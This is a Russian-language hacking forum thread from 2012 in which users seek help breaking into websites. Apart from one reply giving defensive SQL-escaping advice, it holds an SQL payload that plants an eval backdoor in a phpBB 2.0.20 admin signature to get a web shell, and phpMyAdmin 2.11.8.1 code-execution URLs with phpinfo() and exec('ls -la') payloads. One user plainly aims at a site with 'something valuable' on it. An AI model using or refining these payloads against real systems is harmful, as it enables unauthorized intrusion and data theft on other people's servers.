23.07.2012, 15:54
|
|
Участник форума
Регистрация: 21.12.2010
Сообщений: 126
С нами:
8101046
Репутация:
1
|
|
ну это понятно, меня больше интересует возможно ли как нибудь сделать sql inj при регистрации
|
|
|
23.07.2012, 16:18
|
|
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
С нами:
9162683
Репутация:
175
|
|
Сообщение от Kruzak
ну это понятно, меня больше интересует возможно ли как нибудь сделать sql inj при регистрации
Строковые параметры, которые передаешь в SQL запрос из скрипта, обрабатывай функцией mysql_real_escape_string. Те параметры, которые должны быть целочисленными, приводи к типу int. После этого инъекций не будет.
|
|
|
|
24.07.2012, 07:01
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Заранее сорри если миллион раз обсуждалось = \
Собсно вопрос по заливке шелла в phpbb 2.0.20
Вообщем гуглил, и находил только один способ... через востановление бд
FILE_P > Y
Вообщем создаю файл 1.sql в нем код:
Сообщение от None
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;
Востанавливаю БД. Пишет востановилась...
захожу..
http://forum/profile.php?mode=editprofile&с=phpinfo();
phpinfo не выводится = \ что не так ???
help... или подскажите еще какой способ заливки)
Не пинать сильно) давно не занимался такими делами) |
|
|
|
24.07.2012, 09:48
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Сообщение от GroM88
Заранее сорри если миллион раз обсуждалось = \
Собсно вопрос по заливке шелла в phpbb 2.0.20
Вообщем гуглил, и находил только один способ... через востановление бд
FILE_P > Y
Вообщем создаю файл 1.sql в нем код:
Востанавливаю БД. Пишет востановилась...
захожу..
http://forum/profile.php?mode=editprofile&с=phpinfo();
phpinfo не выводится = \ что не так ???
help... или подскажите еще какой способ заливки)
Не пинать сильно) давно не занимался такими делами)
ID у юзера, за которого ты залогинен - 2?
|
|
|
|
24.07.2012, 12:48
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
да, 2
еще вопрос, как в phpbb 2.0.20 раскрыть пути?)
Курил форум) много чего пробовал) не помогло = \
|
|
|
|
24.07.2012, 22:01
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Есть сайт, на нем phpMyAdmin 2.11.8.1
Уязвимость описана к нему тут _/showpost.php?p=871193&postcount=5
Заюзал ее, но что должно произойти? Я так так понимаю на экран должен выпать пасс и логин? Не чиго не происходит
Что я не так делаю?
Там кое что стоящее , если что могу поделиться .
В общем прошу направить меня!!
|
|
|
|
24.07.2012, 22:04
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
Сообщение от WendM
Есть сайт, на нем phpMyAdmin 2.11.8.1
Уязвимость описана к нему тут _/showpost.php?p=871193&postcount=5
Заюзал ее, но что должно произойти? Я так так понимаю на экран должен выпать пасс и логин? Не чиго не происходит
Что я не так делаю?
Там кое что стоящее , если что могу поделиться
.
В общем прошу направить меня!!
Сообщение от None
Выполнение произвольного PHP-кода на сервере, включая вызов внешних команд через PHP-функцию exec().
Код:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR "PHP" //&sort_order=desc&token=[valid token]
|
|
|
|
24.07.2012, 22:34
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от wkar
Код:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR "PHP" //&sort_order=desc&token=[valid token]
Спасиб за ответ, но что то не идет. Пробывал вызвать phpinfo()
Так
Код:
/server_databases.php?pos=0&dbstats=0&sort_by="]) OR //&sort_order=desc&token=[valid token]
и так
Код:
/server_databases.php?pos=0&dbstats=0&sort_by="]) OR phpinfo(); //&sort_order=desc&token=[valid token]
и так
Код:
/server_databases.php?pos=0&dbstats=0&sort_by="]) OR phpinfo() //&sort_order=desc&token=[valid token]
Но результат нулевой
Что я не так делаю?
Token получаю так, ввожу левый пасс и логин, выдает ошибку но в браузерной строке есть токен, его и юзаю
|
|
|
|
24.07.2012, 22:38
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
попробуй
Код:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('ls -la'); //&sort_order=desc&token=[valid token]
|
|
|
|
24.07.2012, 22:42
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от wkar
попробуй
Код:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('ls -la'); //&sort_order=desc&token=[valid token]
Не, ни че не произошло.
А что должно было получиться?
Сервер Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Server at site.ru Port 80
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
